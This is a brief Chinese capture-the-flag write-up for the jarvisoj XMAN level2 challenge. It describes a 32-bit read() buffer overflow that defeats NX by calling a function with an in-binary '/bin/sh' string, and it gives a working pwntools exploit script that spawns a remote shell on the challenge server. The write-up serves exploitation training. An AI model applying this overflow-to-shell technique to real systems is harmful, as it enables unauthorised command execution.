jarvisoj——[XMAN]level2

题目

在这里插入图片描述

Wp

查一下基础项,32位的,开了NX保护,开了NX就没法执行自己的shellcode了。

在这里插入图片描述

ida看一下
在这里插入图片描述

常规的调用,然后看vulnerable_function函数
在这里插入图片描述

很明显的read缓存区溢出,溢出大小为0x88

很好玩的是这个题中有/bin/sh,地址为0x0804A024

在这里插入图片描述
最后溢出结果就是

0x88*‘A’(缓存地址)+0x4*‘A’(返回地址)+函数地址+函数返回地址+参数

那么最后脚本就是:

from pwn import *
sh=remote("pwn2.jarvisoj.com",9878)
payload=0x88*'A'+0x4*'A'+p32(0x08048320)+0x4*'A'+p32(0x0804A024)
sh.send(payload)
sh.interactive()
sh.close()

最后拿到flag

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页